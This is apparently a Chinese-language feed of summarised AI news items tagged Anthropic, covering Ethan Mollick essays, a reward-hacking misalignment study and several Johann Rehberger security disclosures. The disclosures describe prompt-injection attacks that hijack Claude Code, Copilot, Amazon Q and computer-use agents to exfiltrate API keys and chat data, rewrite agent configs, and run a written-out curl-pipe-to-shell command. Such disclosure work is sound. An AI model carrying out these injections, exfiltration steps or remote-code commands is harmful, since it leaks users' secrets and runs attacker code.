#Anthropic
#Anthropic
今日 30 条
Dario Amodei@DarioAmodeiAI 评分5757
Ethan Mollick:One Useful Thing(RSS)精选AI 评分6767 Ethan Mollick 实测 Claude Code 并详解其智能体机制
Ethan Mollick 让 Claude Code(由 Opus 4.5 驱动)独立开发一个创业项目,AI 通过三个选择题确认需求后自主工作 1 小时 14 分钟,生成数百个代码文件并部署了一个可运行、可收款的销售网站。
推荐理由:作者以亲历实验拆解 Claude Code 的上下文压缩、Skills 和 subagents 机制,非程序员也能据此理解并上手这类新工具。
Ilya Sutskever@ilyasutAI 评分6060引用Anthropic@AnthropicAINew Anthropic research: Natural emergent misalignment from reward hacking in production RL. “Reward hacking” is where models learn to cheat on tasks they’re given during training. Our new study finds that the consequences of reward hacking, if unmitigated, can be very serious.
Ethan Mollick:One Useful Thing(RSS)AI 评分6060 Ethan Mollick:与其只看基准分数,不如像面试一样测试你的 AI
Ethan Mollick 撰文指出,MMLU-Pro 等公开基准存在数据污染、题目含义不明和无法度量写作、商业判断等能力的问题,但仍共同反映底层能力的上升趋势。他建议个人用自设的 vibes 测试了解模型风格,组织则应参考 OpenAI 的 GDPval 方法,用真实任务、多次重复和专家盲评来系统评估模型在自己业务上的表现,并通过 GuacaDrone 等案例观察不同模型在模糊判断上的稳定差异。
Johann Rehberger / Embrace The Red(RSS)精选AI 评分7878 Claude Pirate:利用 Anthropic File API 实现数据外泄的攻击链分析
安全研究员 Johann Rehberger 发布对 Claude Code Interpreter 网络访问功能的数据外泄攻击分析。攻击者通过间接提示词注入让 Claude 抓取用户数据(如最近的聊天记录)写入 sandbox 文件,再用攻击者自己的 ANTHROPIC_API_KEY 调用 Anthropic Files API,将最多 30MB 的文件上传到攻击者账户。
推荐理由:作者独立复现了利用默认网络白名单中 api.anthropic.com 和攻击者 API key 的数据外泄链,并给出缓解建议。
Ethan Mollick:One Useful Thing(RSS)精选AI 评分6969 Ethan Mollick 发布当前 AI 使用指南:如何选模型、触发 Deep Research 与避坑
Ethan Mollick 发布最新一版 AI 使用指南,指出约 10% 的人类每周使用 AI,主流用途是寻求信息(21.3%)和实践指导(28.3%)。
推荐理由:作者基于 OpenAI 公布的真实使用数据,给出免费与付费模型的取舍建议,以及各系统选模型和 Deep Research 的具体用法。
Dario Amodei@DarioAmodeiAI 评分5252
Ethan Mollick:One Useful Thing(RSS)精选AI 评分6969 Ethan Mollick 谈 AI 智能体做真实工作:从复现论文到 17 份 PowerPoint
Ethan Mollick 撰文指出 AI 已能完成真实且有经济价值的工作。他给出 Claude Sonnet 4.5 提前访问权限,仅用文件和简单提示词让其复现一篇经济学论文,Claude 自行把 STATA 代码转成 Python 并成功复现结果,他还用 GPT-5 Pro 验证通过。
推荐理由:作者亲测用 Claude Sonnet 4.5 复现经济学论文,并据此分析任务与工作的区别,给出了可迁移的专家与 AI 协作流程。
Johann Rehberger / Embrace The Red(RSS)AI 评分7474 Johann Rehberger 演示跨智能体提权:被攻陷的 GitHub Copilot 可改写配置释放 Claude Code
安全研究员 Johann Rehberger 提出跨智能体提权的新型攻击模式:间接提示词注入可劫持 GitHub Copilot,令其写入 Claude Code 的 MCP 配置(如 ~/.mcp.)或指令文件(如 CLAUDE.md),使 Claude Code 执行任意代码,两个智能体还可互相改写配置形成提权循环。
Ethan Mollick:One Useful Thing(RSS)精选AI 评分6565 Ethan Mollick 谈从协作到巫师:与 AI 共事方式的转变
Ethan Mollick 在 One Useful Thing 发文,认为 AI 使用正从共同协作转向「召唤巫师」式的被动接收。
推荐理由:作者以论文重审、表格改造等一手实测为基础,提出从协作到巫师式 AI 使用的关系转变与验证难题。
Johann Rehberger / Embrace The Red(RSS)AI 评分5757 Amazon Q Developer for VS Code 可被不可见提示词注入攻击
安全研究员 Johann Rehberger 演示 Amazon Q Developer for VS Code 会将人类不可见的 Unicode Tag 字符解释为指令,可用于触发工具调用,并可通过 find -exec 利用实现任意命令执行。
Johann Rehberger / Embrace The Red(RSS)AI 评分6767 Claude Code 曾可经 DNS 请求外泄敏感数据(CVE-2025-55284)
Johann Rehberger 披露 Claude Code 的高危漏洞 CVE-2025-55284:间接提示词注入可劫持 Claude Code,利用 ping 等 allowlist 命令把 .env 中的 API 密钥嵌入 DNS 请求外泄,无需用户批准。
Johann Rehberger / Embrace The Red(RSS)AI 评分5454 Anthropic Filesystem MCP Server 存在目录访问绕过漏洞(CVE-2025-53109)
Johann Rehberger 披露 Anthropic Filesystem MCP Server 的 validatePath 函数仅用 .startsWith 比对 allowedDirectories,不强制路径为目录,导致同名前缀的兄弟目录或文件(如 /mnt/finance/data-archived)也可被访问。
Johann Rehberger / Embrace The Red(RSS)AI 评分6868 Anthropic Slack MCP Server 存在链接预览数据泄露漏洞,且已停止维护不会修复
安全研究员 Johann Rehberger 披露 Anthropic 已弃用且停止维护的 Slack MCP Server 存在数据外泄漏洞:服务器发消息时不禁用链接 unfurling,攻击者可借助提示词注入让 AI Agent 在消息中夹带机密链接,经 Slack 抓取预览时把数据泄露给第三方服务器。
Johann Rehberger / Embrace The Red(RSS)AI 评分4848 用 MCP Server 托管 COM 服务器:实现 Windows 与 Office 自动化
安全研究者 Johann Rehberger 构建了 mcp-com-server,一个可同时托管多个 COM 对象的 MCP server,通过 CreateObject、Get/Set Property、InvokeMethod、QueryInterface 等工具实现 Windows 与 Office 自动化。
Johann Rehberger / Embrace The Red(RSS)AI 评分6060 Johann Rehberger 演示 AI ClickFix 攻击劫持 Claude Computer-Use Agent
Johann Rehberger 发布 AI ClickFix 攻击概念验证,将现实中的 ClickFix 社会工程 TTP 改造后针对 Computer-Use Agent,诱导 claude-3-7-sonnet-20250219 在终端执行 curl -s https://wuzzi.net/computer/oops.html | sh。
Johann Rehberger / Embrace The Red(RSS)AI 评分6868 MCP 安全风险解析:不可信服务器如何借工具元数据劫持 Claude 客户端
安全研究员 Johann Rehberger 发文解析 MCP 的安全风险并展示一条新的漏洞利用链。文章指出仅将恶意工具服务器加入会话即可劫持对话,工具元数据中的隐藏 Unicode Tag 指令可穿透 API 和 UI 层,用户在界面检查时不可见,Claude 会执行这些隐藏指令。
AI as Normal Technology(RSS)AI 评分6969 AI 进步是否在放缓:Narayanan 等人分析模型 scaling 之争与推理 scaling 的局限
Arvind Narayanan、Benedikt Ströbl 和 Sayash Kapoor 撰文分析 OpenAI、Anthropic、Google Gemini 下一代模型遇阻后业内关于模型 scaling 已死的叙事转向,认为现在断言模型 scaling 终结为时尚早,且业内高管的预测受商业利益影响,不应盲从。